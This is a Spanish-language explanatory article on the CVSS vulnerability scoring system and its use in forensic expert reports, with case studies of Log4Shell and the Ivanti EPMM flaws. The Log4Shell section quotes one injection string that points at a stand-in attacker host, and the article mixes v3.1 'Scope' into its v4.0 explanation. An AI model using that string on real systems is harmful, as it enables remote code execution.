CVSS (Common Vulnerability Scoring System)
Estándar abierto que asigna una puntuación de 0 a 10 a las vulnerabilidades de software según su gravedad, impacto y facilidad de explotación. Una puntuación CVSS 9.0+ indica vulnerabilidad crítica con explotación remota sin autenticación.
CVSS 9.8: dos numeros que tumbaron la Comision Europea. En enero de 2026, dos vulnerabilidades criticas en Ivanti Endpoint Manager Mobile (EPMM) con puntuacion CVSS 9.8 cada una (CVE-2026-1281 y CVE-2026-1340) permitieron a atacantes comprometer la infraestructura de la Comision Europea sin necesidad de autenticacion. Cuatro anos antes, Log4Shell (CVE-2021-44228) alcanzo la puntuacion maxima de CVSS 10.0, afectando a mas de 35.000 paquetes Java, el 8% de todo el repositorio Maven Central, y costando a las organizaciones afectadas mas de 10.000 millones de dolares en remediacion. Detras de estas cifras hay un sistema que traduce la complejidad tecnica de las vulnerabilidades en un numero universal: el CVSS (Common Vulnerability Scoring System), el estandar que permite a un perito informatico explicar a un juez, en un solo dato, por que una brecha de seguridad era critica y prevenible.
Definicion tecnica de CVSS
El CVSS (Common Vulnerability Scoring System) es un estandar abierto y gratuito desarrollado por el Forum of Incident Response and Security Teams (FIRST) que proporciona una puntuacion numerica de 0.0 a 10.0 para evaluar la gravedad de las vulnerabilidades de seguridad informatica. Actualmente en su version 4.0 (publicada en noviembre de 2023), el CVSS se ha convertido en el lenguaje universal de la industria para comunicar la severidad de fallos de seguridad.
A diferencia de una evaluacion subjetiva, el CVSS utiliza un conjunto de metricas objetivas y reproducibles que cualquier profesional de ciberseguridad puede calcular de forma independiente, obteniendo la misma puntuacion. Esto lo convierte en una herramienta imprescindible para informes periciales forenses, donde la objetividad es requisito fundamental.
Dato clave
Mas del 94% de las organizaciones que gestionan vulnerabilidades utilizan CVSS como metrica principal de priorizacion, segun el informe State of Vulnerability Management 2025 de Qualys. En Espana, el Centro Criptologico Nacional (CCN-CERT) y el INCIBE utilizan CVSS como estandar en todos sus avisos de seguridad.
El CVSS no mide el riesgo total de una vulnerabilidad para una organizacion concreta: mide la gravedad tecnica intrinseca. El riesgo real depende ademas del contexto de cada organizacion: que sistemas estan expuestos, que datos procesan y que controles compensatorios existen.
Metricas CVSS v4.0: como se calcula la puntuacion
La version 4.0 del CVSS introduce mejoras significativas respecto a la v3.1, incluyendo nuevos grupos de metricas y mayor granularidad. El sistema se estructura en cuatro grupos principales de metricas:
Grupo 1: Metricas Base (Base Score)
Las metricas base representan las caracteristicas intrinsecas de la vulnerabilidad que no cambian con el tiempo ni dependen del entorno. Son las mas importantes y las unicas obligatorias para calcular una puntuacion CVSS.
| Metrica | Valores posibles | Que mide |
|---|---|---|
| Vector de ataque (AV) | Network, Adjacent, Local, Physical | Como puede acceder el atacante al componente vulnerable |
| Complejidad de ataque (AC) | Low, High | Condiciones adicionales necesarias para explotar la vulnerabilidad |
| Requisitos de ataque (AT) | None, Present | Condiciones previas del sistema vulnerable (nuevo en v4.0) |
| Privilegios requeridos (PR) | None, Low, High | Nivel de acceso previo necesario para explotar la vulnerabilidad |
| Interaccion del usuario (UI) | None, Passive, Active | Si la victima debe realizar alguna accion (v4.0 distingue pasiva/activa) |
| Impacto en confidencialidad (VC/SC) | None, Low, High | Perdida de confidencialidad en el sistema vulnerable y sistemas posteriores |
| Impacto en integridad (VI/SI) | None, Low, High | Modificacion no autorizada de datos |
| Impacto en disponibilidad (VA/SA) | None, Low, High | Perdida de acceso a recursos del sistema |
Grupo 2: Metricas de Amenaza (Threat Metrics)
Reflejan el estado actual de explotacion de la vulnerabilidad. En CVSS v4.0, estas metricas sustituyen a las anteriores “Temporal Metrics” de la v3.1.
| Metrica | Valores | Que mide |
|---|---|---|
| Madurez del exploit (E) | Not Defined, Attacked, POC, Unreported | Si existe exploit disponible y si hay ataques activos documentados |
Grupo 3: Metricas Ambientales (Environmental Metrics)
Permiten ajustar la puntuacion al contexto especifico de una organizacion. Son clave para la priorizacion interna.
| Metrica | Que ajusta |
|---|---|
| Requisitos de confidencialidad (CR) | Importancia de la confidencialidad para el activo afectado |
| Requisitos de integridad (IR) | Importancia de la integridad para el activo |
| Requisitos de disponibilidad (AR) | Importancia de la disponibilidad para el activo |
| Metricas base modificadas | Sobreescritura de metricas base segun el entorno |
Grupo 4: Metricas Suplementarias (Supplemental Metrics) - Nuevo en v4.0
| Metrica | Que describe |
|---|---|
| Automatizable (Automatable) | Si el ataque se puede automatizar (gusano) |
| Recuperacion (Recovery) | Capacidad del sistema de recuperarse tras la explotacion |
| Densidad de valor (Value Density) | Riqueza de datos accesibles por el atacante |
| Esfuerzo de respuesta (Response Effort) | Recursos necesarios para responder al incidente |
| Urgencia del proveedor (Provider Urgency) | Evaluacion de urgencia del propio fabricante |
CVSS v4.0 vs v3.1
Muchas organizaciones y bases de datos (incluida la NVD del NIST) aun utilizan CVSS v3.1. Durante el periodo de transicion (2024-2026), un perito forense debe especificar siempre que version de CVSS esta citando en su informe pericial. Las puntuaciones v3.1 y v4.0 para la misma vulnerabilidad pueden diferir ligeramente.
Escala de severidad CVSS: que significa cada rango
La puntuacion numerica se traduce en una escala cualitativa de severidad que facilita la comunicacion con audiencias no tecnicas, como jueces, abogados y directivos:
| Rango | Severidad | Plazo de parcheado recomendado | Ejemplo real | CVSS |
|---|---|---|---|---|
| 0.0 | Ninguna | No requiere accion | Vulnerabilidad teorica sin impacto | 0.0 |
| 0.1 - 3.9 | Baja | Parchear en ciclo normal (90 dias) | Divulgacion limitada de informacion no sensible | 3.1 |
| 4.0 - 6.9 | Media | Parchear en 30 dias | XSS reflejado que requiere interaccion del usuario | 5.4 |
| 7.0 - 8.9 | Alta | Parchear en 7 dias | EternalBlue (CVE-2017-0144): ejecucion remota en Windows SMB | 8.1 |
| 9.0 - 10.0 | Critica | Parchear en 24-72 horas | Log4Shell (CVE-2021-44228): ejecucion remota sin autenticacion | 10.0 |
Regla practica para informes periciales
En un informe pericial, una vulnerabilidad CVSS 9.0+ sin parchear durante mas de 30 dias tras la publicacion del parche se considera generalmente negligencia grave. Para vulnerabilidades CVSS 7.0-8.9, el margen razonable es de 7-14 dias. Para CVSS 4.0-6.9, hasta 30 dias se considera aceptable segun los estandares de la industria (CISA, ENISA, CCN-CERT).
Vulnerabilidades historicas con CVSS: casos reales
El CVSS cobra significado real cuando se aplica a vulnerabilidades que han causado danos medibles. Esta tabla recoge cuatro de las vulnerabilidades mas impactantes de la historia reciente, con su puntuacion CVSS y consecuencias:
| Vulnerabilidad | CVE | CVSS | Ano | Vector de ataque | Impacto real |
|---|---|---|---|---|---|
| Log4Shell | CVE-2021-44228 | 10.0 | 2021 | Red, sin autenticacion, sin interaccion | 35.000+ paquetes Java afectados. Coste de remediacion superior a 10.000M$. Explotacion activa a las 24 horas de publicacion |
| Ivanti EPMM | CVE-2026-1281 / CVE-2026-1340 | 9.8 | 2026 | Red, sin autenticacion, sin interaccion | Comprometio la infraestructura de la Comision Europea. Acceso completo a dispositivos moviles gestionados |
| EternalBlue | CVE-2017-0144 | 8.1 | 2017 | Red, complejidad alta | Usado por WannaCry y NotPetya. Paralizo hospitales (NHS), logistica (Maersk, 300M$ perdidas), telecomunicaciones |
| Heartbleed | CVE-2014-0160 | 7.5 | 2014 | Red, sin autenticacion | 17% de servidores web con SSL afectados. Filtracion de claves privadas, credenciales y datos sensibles de memoria |
Analisis detallado: Log4Shell (CVSS 10.0)
Log4Shell es el ejemplo paradigmatico de lo que significa una puntuacion CVSS maxima. Cada metrica base contribuyo a la puntuacion perfecta de 10.0:
| Metrica | Valor | Justificacion |
|---|---|---|
| Vector de ataque | Network | Explotable remotamente a traves de la red |
| Complejidad | Low | Sin condiciones especiales, trivial de explotar |
| Privilegios | None | No se necesita ningun acceso previo |
| Interaccion usuario | None | La victima no necesita hacer nada |
| Impacto confidencialidad | High | Acceso total a datos del sistema |
| Impacto integridad | High | Modificacion completa de datos y sistema |
| Impacto disponibilidad | High | Denegacion completa del servicio |
La consecuencia: cualquier aplicacion Java que usara la biblioteca Log4j y recibiera input de usuario (practicamente todas) podia ser comprometida remotamente con una simple cadena de texto como ${jndi:ldap://atacante.com/exploit}. La puntuacion CVSS 10.0 comunicaba de forma inequivoca: parchea ahora o seras comprometido.
Analisis detallado: Ivanti EPMM (CVSS 9.8) - Caso Comision Europea 2026
En enero de 2026, investigadores de seguridad descubrieron que dos vulnerabilidades criticas en Ivanti Endpoint Manager Mobile (EPMM) habian sido explotadas para comprometer la infraestructura de la Comision Europea. La puntuacion CVSS 9.8 (no 10.0) se debio a un unico factor:
| Metrica | Valor | Por que no fue 10.0 |
|---|---|---|
| Vector de ataque | Network | Explotable remotamente |
| Complejidad | Low | Trivial de explotar |
| Privilegios | None | Sin autenticacion previa |
| Interaccion usuario | None | Sin interaccion |
| Alcance | Unchanged | Impacto limitado al componente vulnerable (sin propagacion automatica) |
La diferencia entre CVSS 9.8 y 10.0 es tecnica (el alcance), pero en terminos practicos ambas puntuaciones exigen remediacion inmediata. Un perito forense que documente una brecha causada por una vulnerabilidad CVSS 9.8 sin parchear tiene un argumento solido de negligencia.
CVSS en investigaciones forenses: aplicacion practica
Para un perito informatico, el CVSS es una herramienta fundamental que traduce complejidad tecnica en un dato que jueces, abogados y aseguradoras pueden comprender. Su uso en investigaciones forenses abarca multiples dimensiones:
Escenarios donde el CVSS es determinante
| Escenario forense | Rol del CVSS | Impacto en el caso |
|---|---|---|
| Brecha de datos con negligencia | Cuantifica la gravedad de la vulnerabilidad no parcheada | Determina si la organizacion actuo con diligencia |
| Reclamacion de ciberseguro | Demuestra si la vulnerabilidad era conocida y parcheada | La aseguradora puede denegar cobertura si CVSS alto y parche disponible |
| Sancion AEPD/RGPD | Evidencia si las medidas de seguridad eran “adecuadas al riesgo” | Agravante si CVSS critico sin parchear, atenuante si zero-day |
| Responsabilidad de proveedor | Evalua si el software entregado cumplia estandares de seguridad | CVSS alto en producto vendido puede ser incumplimiento contractual |
| Peritaje tras ransomware | Identifica el vector de entrada y su gravedad objetiva | CVSS 9.0+ sin parchear = evidencia de negligencia en informe pericial |
El CVSS como lenguaje comun en sala
Cuando un perito declara ante un tribunal que “la vulnerabilidad explotada tenia una puntuacion CVSS de 9.8 sobre 10, clasificada como critica por el estandar internacional utilizado por FIRST, el NIST y el CCN-CERT”, proporciona al juez un dato objetivo, estandarizado e internacionalmente reconocido que trasciende la jerga tecnica.
Pasos del analisis forense con CVSS
Identificar la vulnerabilidad explotada
Mediante el analisis de logs, trafico de red, memoria y artefactos del sistema, el perito identifica el CVE especifico que fue explotado. Herramientas como Nessus, OpenVAS o el analisis manual de exploits permiten correlacionar los indicadores de compromiso (IOCs) con vulnerabilidades conocidas.
Obtener la puntuacion CVSS oficial
Consultar la puntuacion en la National Vulnerability Database (NVD) del NIST o en la base de datos de FIRST. Registrar tanto la puntuacion CVSS Base como la version utilizada (v3.1 o v4.0). Si existen diferencias entre ambas versiones, documentar las dos.
Documentar el timeline critico
Establecer la cronologia completa: fecha de descubrimiento de la vulnerabilidad, fecha de asignacion del CVE, fecha de publicacion del parche por el fabricante, fecha de aviso por organismos oficiales (CISA KEV, CCN-CERT, INCIBE), y fecha del ataque. El intervalo entre la disponibilidad del parche y el ataque es la metrica clave para evaluar diligencia.
Evaluar el estado de parcheado de la victima
Verificar las versiones de software instaladas en los sistemas comprometidos. Comprobar el historial de actualizaciones (Windows Update, apt logs, registros de gestion de parches). Documentar si existia un proceso formal de gestion de vulnerabilidades.
Calcular el CVSS ambiental ajustado
Aplicar las metricas ambientales al contexto de la organizacion victima. Un hospital con datos de salud (requisito de confidencialidad alto) tendra un CVSS ambiental superior al base si la vulnerabilidad afecta a la confidencialidad. Un sistema de control industrial (requisito de disponibilidad alto) tendra un CVSS ambiental mayor si la vulnerabilidad afecta a la disponibilidad.
Elaborar la conclusion pericial con CVSS como soporte
Redactar las conclusiones utilizando el CVSS como metrica objetiva. Ejemplo: “La vulnerabilidad CVE-2026-XXXX, con puntuacion CVSS 9.8 (critica), permanecio sin parchear durante 45 dias tras la publicacion del parche. Segun los estandares de la industria (CISA, ENISA), el plazo razonable de parcheado para vulnerabilidades criticas es de 24-72 horas. El incumplimiento de este estandar constituye, a criterio de este perito, una falta de diligencia en la gestion de la seguridad informatica.”
CVSS en el marco legal espanol
El CVSS no es mencionado explicitamente en la legislacion espanola, pero su relevancia juridica es indirecta y creciente a traves de multiples marcos normativos:
RGPD (Reglamento General de Proteccion de Datos)
El articulo 32 del RGPD exige “medidas tecnicas y organizativas apropiadas para garantizar un nivel de seguridad adecuado al riesgo”. El CVSS proporciona la metrica objetiva para evaluar si las medidas eran “adecuadas”:
- CVSS 9.0-10.0 sin parchear: La AEPD puede considerar que la organizacion no implemento medidas adecuadas al riesgo conocido
- Parche disponible y no aplicado: Agravante en procedimiento sancionador
- Zero-day: Atenuante, ya que la organizacion no tenia forma de conocer ni remediar la vulnerabilidad
La AEPD ha impuesto sanciones superiores a 500.000 EUR en casos donde las organizaciones no parchearon vulnerabilidades criticas conocidas que derivaron en brechas de datos personales.
Directiva NIS2 (transpuesta como RDL 7/2025)
La NIS2 exige a entidades esenciales e importantes que implementen “politicas de analisis de riesgos y seguridad de los sistemas de informacion” (Art. 21). Esto incluye:
- Gestion de vulnerabilidades con priorizacion basada en CVSS
- Pentesting periodico que utiliza CVSS para clasificar hallazgos
- Notificacion de incidentes que involucren vulnerabilidades criticas
Codigo Penal: diligencia y responsabilidad
En el ambito penal, el CVSS es util para determinar:
| Concepto legal | Como contribuye el CVSS |
|---|---|
| Diligencia debida | Demuestra si la organizacion conocia la gravedad del riesgo |
| Negligencia grave (Art. 264 CP) | CVSS critico sin parchear puede evidenciar negligencia en proteccion de datos |
| Responsabilidad del fabricante | CVSS alto en producto sin parche puede indicar defecto en seguridad |
| Atenuante | CVSS bajo o vulnerabilidad zero-day pueden atenuar responsabilidad de la victima |
Ciberseguros y CVSS
Las polizas de ciberseguro cada vez incluyen clausulas mas especificas relacionadas con la gestion de vulnerabilidades:
| Clausula tipica de poliza | Relacion con CVSS |
|---|---|
| ”Mantener sistemas actualizados con parches criticos” | CVSS 9.0+ define que es “critico" |
| "Aplicar parches de seguridad en plazo razonable” | CVSS determina la urgencia del plazo |
| ”Exclusion por vulnerabilidad conocida no parcheada” | La fecha del CVE y el CVSS prueban el conocimiento |
Tendencia en ciberseguros
Desde 2024, las principales aseguradoras espanolas (Mapfre, AXA, Zurich) incluyen requisitos explicitos de gestion de vulnerabilidades en sus polizas ciber. Un informe pericial que demuestre CVSS 9.0+ sin parchear durante mas de 30 dias puede ser determinante para que la aseguradora deniegue la cobertura del siniestro.
Limitaciones del CVSS y metricas complementarias
El CVSS, pese a ser el estandar mas utilizado, tiene limitaciones que un perito forense debe conocer:
| Limitacion | Explicacion | Metrica complementaria |
|---|---|---|
| No mide el riesgo real | CVSS mide gravedad tecnica, no probabilidad de explotacion | EPSS (Exploit Prediction Scoring System) |
| No considera el contexto | Sin metricas ambientales, ignora el entorno de la organizacion | SSVC (Stakeholder-Specific Vulnerability Categorization) de CISA |
| Puntuacion estatica | La puntuacion base no cambia, aunque aparezcan exploits | CVSS Threat Metrics + CISA KEV |
| Fatiga de alertas | Demasiadas vulnerabilidades “criticas” complican la priorizacion | EPSS filtra vulnerabilidades con alta probabilidad de explotacion real |
EPSS (Exploit Prediction Scoring System): Desarrollado por FIRST (el mismo organismo detras de CVSS), EPSS calcula la probabilidad de que una vulnerabilidad sea explotada en los proximos 30 dias, en una escala de 0 a 1. Un perito forense puede combinar CVSS (gravedad) con EPSS (probabilidad) para un analisis de riesgo mas completo en su informe pericial.
Herramientas para calcular y consultar CVSS
| Herramienta | Funcion | Acceso |
|---|---|---|
| NVD (NIST) | Base de datos oficial con puntuaciones CVSS para todos los CVE | Gratuito: nvd.nist.gov |
| FIRST CVSS Calculator | Calculadora oficial interactiva para CVSS v4.0 y v3.1 | Gratuito: first.org/cvss/calculator |
| CVE.org | Base de datos de CVE gestionada por MITRE | Gratuito: cve.org |
| CISA KEV | Catalogo de vulnerabilidades explotadas activamente | Gratuito: cisa.gov/known-exploited-vulnerabilities |
| Nessus / OpenVAS | Escaneres de vulnerabilidades que calculan CVSS automaticamente | Comercial / Open-source |
| CCN-CERT (Espana) | Avisos de seguridad con puntuaciones CVSS para administracion publica | Gratuito: ccn-cert.cni.es |
Preguntas frecuentes
Que significa una puntuacion CVSS de 9.8?
Una puntuacion CVSS de 9.8 sobre 10 indica una vulnerabilidad critica que cumple casi todas las condiciones de maxima gravedad: es explotable remotamente a traves de la red (vector Network), con complejidad baja, sin necesidad de autenticacion ni privilegios previos, y sin requerir ninguna interaccion del usuario. El impacto en confidencialidad, integridad y disponibilidad es alto.
La razon por la que alcanza 9.8 y no 10.0 suele ser el parametro de “Alcance” (Scope): en CVSS 9.8, el impacto se limita al componente vulnerable, mientras que en CVSS 10.0 (como Log4Shell), la explotacion puede afectar a componentes mas alla del sistema vulnerable.
Ejemplos recientes con CVSS 9.8: las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 en Ivanti EPMM que comprometieron la Comision Europea en enero de 2026, y CVE-2024-21762 en FortiOS que fue explotada masivamente para desplegar ransomware.
Como se calcula la puntuacion CVSS?
El calculo de CVSS se realiza mediante una formula matematica que combina las metricas base. El proceso es el siguiente:
- Evaluar cada metrica base: Para cada una de las 8+ metricas (vector de ataque, complejidad, privilegios, interaccion del usuario, impacto en CIA), se selecciona el valor que describe la vulnerabilidad
- Asignar pesos numericos: Cada valor tiene un peso predefinido por el estandar (por ejemplo, AV:Network = 0.85, AV:Local = 0.55)
- Calcular sub-puntuaciones: Se combinan los pesos de explotabilidad (AV, AC, PR, UI) y los de impacto (C, I, A) en sub-puntuaciones
- Aplicar la formula final: La formula combina las sub-puntuaciones con un factor de ajuste por alcance (Scope), produciendo un numero entre 0.0 y 10.0
- Redondear al decimal superior: El resultado se redondea a un decimal
En la practica, la mayoria de los profesionales utilizan la calculadora oficial de FIRST o las puntuaciones ya asignadas por el NIST en la NVD, en lugar de calcular manualmente. Lo importante para un perito forense es entender que significa cada metrica y como impacta en la puntuacion final, para poder explicarlo ante un tribunal.
Por que es importante el CVSS en un informe pericial forense?
El CVSS aporta cuatro valores fundamentales a un informe pericial:
- Objetividad: La puntuacion es calculada mediante un estandar internacional publico, no es una opinion subjetiva del perito. Cualquier otro profesional puede verificar independientemente la puntuacion
- Universalidad: El CVSS es comprendido por la industria de ciberseguridad a nivel mundial. Cuando un perito cita CVSS 9.8, cualquier experto en cualquier pais entiende exactamente la gravedad
- Comprensibilidad judicial: Un juez sin conocimientos tecnicos puede entender “9.8 sobre 10, clasificado como critico”. Es infinitamente mas claro que explicar vectores de ataque, buffers overflow o inyecciones de codigo
- Determinacion de diligencia: El CVSS, combinado con la fecha de publicacion del parche y la fecha del ataque, permite establecer de forma objetiva si la organizacion victima actuo con la diligencia debida o fue negligente
En procedimientos judiciales espanoles, el CVSS se ha utilizado como soporte probatorio en casos de reclamaciones de ciberseguros, sanciones de la AEPD por brechas de datos, y procedimientos penales por danos informaticos donde se evalua la concurrencia de negligencia en la proteccion de sistemas.
Conceptos relacionados
- CVE (Vulnerabilidades) - El sistema de identificacion de vulnerabilidades cuya gravedad mide el CVSS
- Zero-Day - Vulnerabilidades sin parche cuyo CVSS suele ser alto por la ausencia de mitigaciones
- Pentesting - Los informes de pentesting clasifican hallazgos por puntuacion CVSS
- IOCs (Indicadores de Compromiso) - Los IOCs se correlacionan con CVEs que tienen puntuaciones CVSS asignadas
- Analisis Forense Digital - Disciplina donde el CVSS contextualiza la gravedad de las vulnerabilidades explotadas
Referencias y fuentes
FIRST - “Common Vulnerability Scoring System v4.0 Specification”. first.org/cvss/v4.0/specification-document
NIST - “National Vulnerability Database (NVD)”. nvd.nist.gov
EUobserver - “EU Commission hack linked to Ivanti EPMM vulnerabilities (CVE-2026-1281, CVE-2026-1340), CVSS 9.8”. euobserver.com
Apache Foundation - “Apache Log4j Security Vulnerabilities - CVE-2021-44228, CVSS 10.0”. logging.apache.org/log4j/2.x/security
Qualys - “State of Vulnerability Management 2025: CVSS adoption exceeds 94%”. qualys.com
CISA - “Known Exploited Vulnerabilities Catalog”. cisa.gov/known-exploited-vulnerabilities-catalog
CCN-CERT - “Avisos de seguridad del Centro Criptologico Nacional”. ccn-cert.cni.es
RGPD - Reglamento (UE) 2016/679, Art. 32 sobre seguridad del tratamiento. eur-lex.europa.eu
NIS2 - Directiva (UE) 2022/2555, Art. 21 sobre medidas de gestion de riesgos de ciberseguridad. eur-lex.europa.eu
FIRST - “Exploit Prediction Scoring System (EPSS)”. first.org/epss
Maersk - “NotPetya attack: $300M in losses from unpatched EternalBlue (CVSS 8.1)”. Comunicado corporativo 2017.
Ultima actualizacion: Febrero 2026 Categoria: Seguridad Codigo: SEG-022
Preguntas Frecuentes
¿Qué significa una puntuación CVSS de 9.8?
Una puntuación CVSS de 9.8 sobre 10 indica una vulnerabilidad crítica que permite ejecución remota de código sin autenticación previa, a través de la red, sin interacción del usuario. Ejemplo: las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 en Ivanti EPMM que comprometieron la Comisión Europea en enero de 2026 tenían CVSS 9.8.
¿Cómo se calcula la puntuación CVSS?
CVSS v4.0 evalúa múltiples métricas: vector de ataque (red/local), complejidad, privilegios requeridos, interacción del usuario, impacto en confidencialidad/integridad/disponibilidad, y alcance. La combinación genera una puntuación de 0 a 10: Bajo (0.1-3.9), Medio (4.0-6.9), Alto (7.0-8.9), Crítico (9.0-10.0).
¿Por qué es importante el CVSS en un informe pericial forense?
El CVSS permite al perito informático cuantificar objetivamente la gravedad de la vulnerabilidad explotada en un incidente. En informes periciales para tribunales, el CVSS proporciona una métrica estándar internacional que los jueces pueden entender: 'la vulnerabilidad explotada tenía una gravedad de 9.8 sobre 10, clasificada como crítica por el estándar internacional CVSS'.
¿Necesitas un peritaje forense?
Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.
Solicitar Consulta Gratuita